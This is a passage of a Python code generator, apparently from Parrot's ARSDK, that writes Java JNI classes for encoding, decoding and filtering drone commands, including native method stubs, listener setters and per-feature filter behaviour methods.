first = False
else:
jfile.write (', ')
jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name)
jfile.write (');\n')
jfile.write ('}\n')
jfile.close ()
jfile = open (paths.JNI_JFILE, 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('\n')
jfile.write ('import ' + SDK_PACKAGE_ROOT + 'arsal.ARNativeData;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Java representation of a C ' + JNIClassName + ' object.<br>\n')
jfile.write (' * This class holds either app-generated objects, that are to be sent\n')
jfile.write (' * to the device, or network-generated objects, that are to be decoded by\n')
jfile.write (' * the application.\n')
jfile.write (' * @author Parrot (c) 2013\n')
jfile.write (' */\n')
jfile.write ('public class ' + JNIClassName + ' extends ARNativeData {\n')
jfile.write ('\n')
jfile.write (' public static final int ' + ARMacroName (LIB_MODULE, JNIClassName, 'HEADER_SIZE') + ' = 4;\n')
jfile.write (' public static final boolean ' + ARMacroName (LIB_MODULE, JNIClassName, 'HAS_DEBUG_COMMANDS') + ' = ')
if genDebug:
jfile.write ('true;\n')
else:
jfile.write ('false;\n')
jfile.write (' private static final ' + JNIDecoderClassName + ' _decoder = new '+JNIDecoderClassName+'();\n')
jfile.write ('\n')
# Generate bit field flags
for ftr in allFeatures:
oldEnumValFrm = False if ftr.classes == None else True
for enum in ftr.enums:
if enum.usedLikeBitfield:
for eVal in enum.values:
jfile.write (' public static final int ' + ARFlagValue (LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name) + ' = (1 << '+ARJavaEnumValue (LIB_MODULE, get_ftr_old_name(ftr), enum.name, eVal.name, oldEnumValFrm)+ '.getValue()); ///< ' + eVal.doc.replace('\n', '\\n') + '\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new, empty ' + JNIClassName + ' with the default size.<br>\n')
jfile.write (' * This is a typical constructor for app-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' () {\n')
jfile.write (' super ();\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new, empty ' + JNIClassName + ' with an user-specified size.<br>\n')
jfile.write (' * This is a typical constructor for app-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param capacity user specified capacity of the command buffer\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (int capacity) {\n')
jfile.write (' super (capacity);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIClassName + ' from another ARNativeData instance.<br>\n')
jfile.write (' * This is a typical constructor for network-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param oldData ARNativeData which contains original data\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (ARNativeData oldData) {\n')
jfile.write (' super (oldData);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIClassName + ' from a c pointer and size.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param data The original data buffer to copy\n')
jfile.write (' * @param dataSize The original data buffer size\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (long data, int dataSize) {\n')
jfile.write (' super (data, dataSize);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIClassName + ' from another ARNativeData, with a given minimum capacity.<br>\n')
jfile.write (' * This is a typical constructor for network-generated ' + JNIClassName + '.<br>\n')
jfile.write (' * To optimize memory, the application can reuse an ' + JNIClassName + '\n')
jfile.write (' * object after it was disposed.\n')
jfile.write (' * @param oldData ARNativeData which contains original data\n')
jfile.write (' * @param capacity Minimum capacity of this object\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIClassName + ' (ARNativeData oldData, int capacity) {\n')
jfile.write (' super (oldData, capacity);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Describe a ' + JNIClassName + '.<br>\n')
jfile.write (' * @return A String describing the ' + JNIClassName + ', with arguments values included\n')
jfile.write (' */\n')
jfile.write (' public String toString () {\n')
jfile.write (' return nativeToString (pointer, used);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Try to describe an ARNativeData as if it was an ' + JNIClassName + '.<br>\n')
jfile.write (' * @return A String describing the ARNativeData, if possible as an ' + JNIClassName + '.\n')
jfile.write (' */\n')
jfile.write (' public static String arNativeDataToARCommandString (ARNativeData data) {\n')
jfile.write (' if (data == null) { return "null"; }\n')
jfile.write (' String ret = nativeStaticToString(data.getData(), data.getDataSize());\n')
jfile.write (' if (ret == null) { ret = data.toString(); }\n')
jfile.write (' return ret;\n');
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * @deprecated\n')
jfile.write (' * Decodes the current ' + JNIClassName + ', calling commands listeners<br>\n')
jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIClassName + ',\n')
jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode () {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if (!valid) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' return _decoder.decode (this);\n')
jfile.write (' }\n')
jfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' /**\n')
jfile.write (' * Set an ' + JNIClassName + ' to hold the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n')
jfile.write (' * <br>\n')
jfile.write (' * Feature ' + ARCapitalize (get_ftr_old_name(ftr)) + ' description:<br>\n')
jfile.write (' * ' + ftr.doc.replace('\n', '\\n') + '<br>\n')
jfile.write (' * <br>\n')
if cmd.cls:
jfile.write (' * Class ' + ARCapitalize (cmd.cls.name) + ' description:<br>\n')
jfile.write (' * ' + cmd.cls.doc.replace('\n', '\\n') + '<br>\n')
jfile.write (' * <br>\n')
jfile.write (' * Command ' + ARCapitalize (cmd.name) + ' description:<br>\n')
if cmd.isDeprecated:
jfile.write (' * @deprecated\n')
jfile.write (' * ' + cmd.doc.desc.replace('\n', '<br>\n * ') + '<br>\n')
jfile.write (' * <br>\n')
jfile.write (' * This function reuses the current ' + JNIClassName + ', replacing its content with a\n')
jfile.write (' * new command created from the current params\n')
for arg in cmd.args:
jfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n')
#If the argument is a bitfield
if isinstance(arg.argType, ArBitfield):
jfile.write (' * @param _' + arg.name + ' a combination of')
#find the feature owning the enum
for bitFieldFtr in allFeatures:
for enum2 in bitFieldFtr.enums:
if enum2 == arg.argType.enum:
break;
else:
continue
break
for eVal in arg.argType.enum.values:
jfile.write (' ; ' + ARFlagValue(LIB_MODULE, bitFieldFtr.name , arg.argType.enum.name, eVal.name))
jfile.write ('\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' error code.\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name)
jfile.write (') {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if (!valid) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' int errInt = nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (pointer, capacity')
for arg in cmd.args:
if isinstance(arg.argType, ArEnum):
jfile.write (', _' + arg.name + '.getValue()')
elif isinstance(arg.argType, ArMultiSetting):
for multiset_msg in arg.argType.msgs:
jfile.write (', _' + arg.name + '.get'+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+'IsSet()')
for multiset_msg_arg in multiset_msg.args:
jfile.write (', _' + arg.name + '.get'+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+ARCapitalize(multiset_msg_arg.name)+'()')
else:
jfile.write (', _' + arg.name)
jfile.write (');\n')
jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.getFromValue (errInt) != null) {\n')
jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.getFromValue (errInt);\n')
jfile.write (' }\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' /**\n')
jfile.write (' * @deprecated\n')
jfile.write (' * Set the listener for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n')
jfile.write (' * Listeners are static to the class, and are not to be set on every object\n')
jfile.write (' * @param ' + interfaceVar (ftr, cmd) + '_PARAM New listener for the command\n')
jfile.write (' */\n')
jfile.write (' public static void set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener (' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + '_PARAM) {\n')
jfile.write (' _decoder.set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener(' + interfaceVar (ftr, cmd) + '_PARAM);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write (' private native String nativeToString (long jpdata, int jdataSize);\n')
jfile.write (' private static native String nativeStaticToString (long jpdata, int jdataSize);\n')
jfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' private native int nativeSet' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + ' (long pdata, int dataTotalLength')
for arg in cmd.args:
if isinstance (arg.argType, ArEnum):
jfile.write (', int ' + arg.name)
elif isinstance(arg.argType, ArMultiSetting):
for multiset_msg in arg.argType.msgs:
jfile.write (', int '+ARCapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+'IsSet')
for multiset_msg_arg in multiset_msg.args:
jfile.write (', ' + xmlToJava (LIB_MODULE, multiset_msg.ftr, multiset_msg, multiset_msg_arg) + ' '+ARUncapitalize(multiset_msg.ftr.name)+ARCapitalize(multiset_msg.name)+ARCapitalize(multiset_msg_arg.name)+'')
else:
jfile.write (', ' + xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name)
jfile.write (');\n')
jfile.write ('\n')
jfile.write ('\n')
jfile.write ('}\n')
jfile.close ()
jfile = open (paths.JNI_DECODER_JFILE, 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('import com.parrot.arsdk.arsal.ARSALPrint;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Java representation of a C ' + JNIDecoderClassName + ' object.<br>\n')
jfile.write (' * This class allow to decode ARCommands.\n')
jfile.write (' * @author Parrot (c) 2016\n')
jfile.write (' */\n')
jfile.write ('public class ' + JNIDecoderClassName + ' {\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Storage of the C Pointer\n')
jfile.write (' */\n')
jfile.write (' protected long pointer;\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Check validity before all native calls\n')
jfile.write (' */\n')
jfile.write (' protected boolean valid;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Dummy throwable to keep the constructors call stack\n')
jfile.write (' */\n')
jfile.write ('\n')
jfile.write (' private Throwable constructorCallStack;\n')
jfile.write ('\n')
jfile.write (' protected static final String TAG = "'+JNIDecoderClassName+'";\n')
jfile.write ('\n')
jfile.write (' private static native void nativeStaticInit ();\n')
jfile.write (' static\n')
jfile.write (' {\n')
jfile.write (' nativeStaticInit();\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new, ' + JNIDecoderClassName + '\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIDecoderClassName + ' () {\n')
jfile.write ('\n')
jfile.write (' this.pointer = nativeNewDecoder ();\n')
jfile.write (' this.valid = false;\n')
jfile.write (' if (this.pointer != 0) {\n')
jfile.write (' this.valid = true;\n')
jfile.write (' }\n')
jfile.write (' this.constructorCallStack = new Throwable();\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /* ********** */\n')
jfile.write (' /* DESTRUCTOR */\n')
jfile.write (' /* ********** */\n')
jfile.write (' protected void finalize () throws Throwable {\n')
jfile.write (' try {\n')
jfile.write (' if (valid) {\n')
jfile.write (' ARSALPrint.w (TAG, this + ": Finalize error -> dispose () was not called !", this.constructorCallStack);\n')
jfile.write (' dispose ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write (' finally {\n')
jfile.write (' super.finalize ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /* ************** */\n')
jfile.write (' /* IMPLEMENTATION */\n')
jfile.write (' /* ************** */\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Checks the object validity\n')
jfile.write (' * @return <code>true</code> if the object is valid (buffer properly alloc and usable)<br><code>false</code> if the object is invalid (alloc error, disposed object)\n')
jfile.write (' */\n')
jfile.write (' public boolean isValid () {\n')
jfile.write (' return valid;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Marks a native data as unused (so C-allocated memory can be freed)<br>\n')
jfile.write (' * A disposed data is marked as invalid\n')
jfile.write (' */\n')
jfile.write (' public void dispose () {\n')
jfile.write (' if (valid)\n')
jfile.write (' nativeDeleteDecoder (pointer);\n')
jfile.write (' this.valid = false;\n')
jfile.write (' this.pointer = 0;\n')
jfile.write (' }\n')
jfile.write (' /**\n')
jfile.write (' * Decodes a ' + JNIClassName + ', calling commands listeners<br>\n')
jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIDecoderClassName + ',\n')
jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n')
jfile.write (' * @param command command to decode.\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode ('+JNIClassName+' command) {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if ((!valid) || (command == null) || (!command.isValid())) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' int errInt = nativeDecode (pointer, command.getData(), command.getDataSize());\n')
jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt) != null) {\n')
jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt);\n')
jfile.write (' }\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Decodes a command calling commands listeners<br>\n')
jfile.write (' * If a listener was set for the Class/Command contained within the ' + JNIDecoderClassName + ',\n')
jfile.write (' * its <code>onClassCommandUpdate(...)</code> function will be called in the current thread.\n')
jfile.write (' * @param command command to decode.\n')
jfile.write (' * @return An ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' error code\n')
jfile.write (' */\n')
jfile.write (' public ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' decode (long data, int size) {\n')
jfile.write (' ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' err = ' + ARJavaEnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR', True) + ';\n')
jfile.write (' if (!valid) {\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write (' int errInt = nativeDecode (pointer, data, size);\n')
jfile.write (' if (' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt) != null) {\n')
jfile.write (' err = ' + ARJavaEnumType (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.getFromValue (errInt);\n')
jfile.write (' }\n')
jfile.write (' return err;\n')
jfile.write (' }\n')
jfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' private ' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + ';\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Set the listener for the command <code>' + ARCapitalize (format_cmd_name(cmd)) + '</code> in feature <code>' + ARCapitalize (get_ftr_old_name(ftr)) + '</code><br>\n')
jfile.write (' * Listeners are static to the class, and are not to be set on every object\n')
#~ jfile.write (' * @param ' + interfaceVar (ftr, cmd) + '_PARAM New listener for the command\n')nativeDecode
jfile.write (' */\n')
jfile.write (' public void set' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener (' + interfaceName (ftr, cmd) + ' ' + interfaceVar (ftr, cmd) + '_PARAM) {\n')
jfile.write (' ' + interfaceVar (ftr, cmd) + ' = ' + interfaceVar (ftr, cmd) + '_PARAM;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
for ftr in allFeatures:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' void ' + javaCbName (ftr, cmd) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (xmlToJava (LIB_MODULE, ftr, cmd, arg) + ' ' + arg.name)
jfile.write (') {\n')
jfile.write (' if(' + interfaceVar (ftr, cmd) + ' != null) {\n')
jfile.write (' ' + interfaceVar (ftr, cmd) + '.' + javaCbName (ftr, cmd) + ' (')
first = True
for arg in cmd.args:
if first:
first = False
else:
jfile.write (', ')
jfile.write (arg.name)
jfile.write (');\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /* **************** */\n')
jfile.write (' /* NATIVE FUNCTIONS */\n')
jfile.write (' /* **************** */\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Memory allocation in native memory space<br>\n')
jfile.write (' * Allocates a decoder and return its C-Pointer\n')
jfile.write (' * @return C-Pointer on the decoder, or 0 (C-NULL) if the alloc failed\n')
jfile.write (' */\n')
jfile.write (' private native long nativeNewDecoder ();\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Memory release in native memory space<br>\n')
jfile.write (' * Frees a decoder from its C-Pointer<br>\n')
jfile.write (' * This call is needed because JVM do not know about native memory allocs\n')
jfile.write (' * @param decoder C-Pointer on the decoder to free\n')
jfile.write (' */\n')
jfile.write (' private native void nativeDeleteDecoder (long decoder);\n')
jfile.write ('\n')
jfile.write (' private native int nativeDecode (long jdecoder, long jpdata, int jdataSize);\n')
jfile.write ('\n')
jfile.write ('}\n')
jfile.write ('\n')
jfile.close ()
jfile = open (paths.JNI_FILTER_JFILE, 'w')
jfile.write (LICENCE_HEADER)
jfile.write ('package ' + JNI_PACKAGE_NAME + ';\n')
jfile.write ('\n')
jfile.write ('import com.parrot.arsdk.arsal.ARSALPrint;\n')
jfile.write ('\n')
jfile.write ('/**\n')
jfile.write (' * Java implementation of a C ' + JNIFilterClassName + ' object.<br>\n')
jfile.write (' * @author Parrot (c) 2014\n')
jfile.write (' */\n')
jfile.write ('public class ' + JNIFilterClassName + '\n')
jfile.write ('{\n')
jfile.write (' private long cFilter;\n')
jfile.write (' private boolean valid;\n')
jfile.write (' private static final String TAG = ' + JNIFilterClassName + '.class.getSimpleName();\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIFilterClassName + ' which allows all commands.\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIFilterClassName + ' () {\n')
jfile.write (' this(ARCOMMANDS_FILTER_STATUS_ENUM.ARCOMMANDS_FILTER_STATUS_ALLOWED);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Creates a new ' + JNIFilterClassName + ' with the given default behavior.\n')
jfile.write (' * @param behavior The default behavior of the filter.\n')
jfile.write (' * @warning Only ALLOWED and BLOCK are allowed as default behavior. Providing any other value will create an invalid object.\n')
jfile.write (' */\n')
jfile.write (' public ' + JNIFilterClassName + ' (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' this.cFilter = nativeNewFilter (behavior.getValue());\n')
jfile.write (' this.valid = (this.cFilter != 0);\n')
jfile.write (' if (! this.valid) {\n')
jfile.write (' dispose();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Checks the object validity.\n')
jfile.write (' * @return <code>true</code> if the object is valid<br><code>false</code> if the object is invalid.\n')
jfile.write (' */\n')
jfile.write (' public boolean isValid () {\n')
jfile.write (' return valid;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Marks a ' + JNIFilterClassName + ' as unused (so C-allocated memory can be freed)<br>\n')
jfile.write (' * A disposed ' + JNIFilterClassName + ' is marked as invalid.\n')
jfile.write (' */\n')
jfile.write (' public void dispose () {\n')
jfile.write (' if (valid) {\n')
jfile.write (' nativeDeleteFilter (cFilter);\n')
jfile.write (' }\n')
jfile.write (' this.valid = false;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Gets the native pointer for this filter\n')
jfile.write (' * @return The pointer.\n')
jfile.write (' */\n')
jfile.write (' public long getFilter () {\n')
jfile.write (' return cFilter;\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' protected void finalize () throws Throwable {\n')
jfile.write (' try {\n')
jfile.write (' if (valid) {\n')
jfile.write (' ARSALPrint.e (TAG, this + ": Finalize error -> dispose () was not called !");\n')
jfile.write (' dispose ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write (' finally {\n')
jfile.write (' super.finalize ();\n')
jfile.write (' }\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' /**\n')
jfile.write (' * Filters a command.<br>\n')
jfile.write (' * This function returns the filter behavior for the given ' + JNIClassName + '.<br>\n')
jfile.write (' * @param command The command to be filtered.\n')
jfile.write (' * @return The filter status.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_STATUS_ENUM filterCommand (' + JNIClassName + ' command) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_STATUS_ENUM.ARCOMMANDS_FILTER_STATUS_ERROR; }\n')
jfile.write (' int cStatus = nativeFilterCommand (cFilter, command.getData(), command.getDataSize());\n')
jfile.write (' return ARCOMMANDS_FILTER_STATUS_ENUM.getFromValue(cStatus);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write (' private native long nativeNewFilter (int behavior);\n')
jfile.write (' private native void nativeDeleteFilter (long cFilter);\n')
jfile.write (' private native int nativeFilterCommand (long cFilter, long command, int len);\n')
jfile.write ('\n')
for ftr in allFeatures:
jfile.write (' // Feature ' + get_ftr_old_name(ftr) + '\n')
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for all commands ' + ARCapitalize(get_ftr_old_name(ftr)) + '.XXX.XXX.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
if ftr.classes: # projetc only
for cl in ftr.classes:
jfile.write (' // - Class ' + cl.name + '\n')
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for all commands ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cl.name) + '.XXX.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
for cmd in cl.cmds:
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for the command ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cl.name) + '.' + ARCapitalize(cmd.name) + '.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize(cmd.name) + 'Behavior (this.cFilter, behavior.getValue());\n')
jfile.write (' return ARCOMMANDS_FILTER_ERROR_ENUM.getFromValue(cErr);\n')
jfile.write (' }\n')
jfile.write ('\n')
jfile.write ('\n')
else:
for cmd in ftr.cmds + ftr.evts:
jfile.write (' private native int nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (long cFilter, int behavior);\n')
jfile.write (' /**\n')
jfile.write (' * Sets the behavior for the command ' + ARCapitalize(get_ftr_old_name(ftr)) + '.' + ARCapitalize(cmd.name) + '.\n')
jfile.write (' * @param behavior The behavior to set.\n')
jfile.write (' * @return An ARCOMMANDS_FILTER_ERROR_ENUM value.\n')
jfile.write (' */\n')
jfile.write (' public ARCOMMANDS_FILTER_ERROR_ENUM set' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (ARCOMMANDS_FILTER_STATUS_ENUM behavior) {\n')
jfile.write (' if (! valid) { return ARCOMMANDS_FILTER_ERROR_ENUM.ARCOMMANDS_FILTER_ERROR_BAD_FILTER; }\n')
jfile.write (' int cErr = nativeSet' + ARCapitalize(get_ftr_old_name(ftr)) + ARCapitalize(cmd.name) + 'Behavior (this.cFilter, behavior.getValue());\n')
